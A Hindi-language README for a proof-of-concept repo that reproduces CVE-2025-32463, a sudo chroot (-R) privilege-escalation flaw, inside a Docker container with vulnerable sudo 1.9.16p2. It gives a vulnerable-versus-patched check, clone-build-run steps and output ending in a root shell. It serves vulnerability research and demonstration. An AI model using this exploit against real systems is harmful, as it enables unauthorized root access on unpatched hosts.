
chwoot PoC का C पुनर्कार्यान्वयन
यह रिपॉजिटरी sudo की chroot सुविधा में CVE‑2025‑32463 विशेषाधिकार-वृद्धि दोष को प्रदर्शित करने के लिए एक न्यूनतम, पुनरुत्पादित वातावरण प्रदान करती है।
अधिकांश लिनक्स वितरणों पर sudo 1.9.14 से 1.9.17 (सभी p‑संशोधन) के भेद्य बिल्ड प्रभावित हैं।
सुरक्षा पृष्ठ
| फ़ाइल | उद्देश्य |
|---|---|
| Dockerfile | Ubuntu 24.04 इमेज बनाता है जिसमें भेद्य sudo 1.9.16p2 और बिल्ड टूल्स हैं |
| sudo‑chwoot.sh | प्रमाण-अवधारणा शोषण जो chroot के अंदर एक रूट शेल उत्पन्न करता है |
| run.sh | सहायक स्क्रिप्ट जो इमेज बनाती है (यदि आवश्यक हो) और शोषण कंटेनर लॉन्च करती है |
# Vulnerable sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463
# 2 – build and run Docker image (tagged "vpr-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#
run.sh Docker को --privileged और --rm पास करता है ताकि जब आप बाहर निकलें तो कंटेनर स्वयं साफ हो जाए।
जब आप कर लें तो इमेज हटाएँ:
docker rmi vpr-chwoot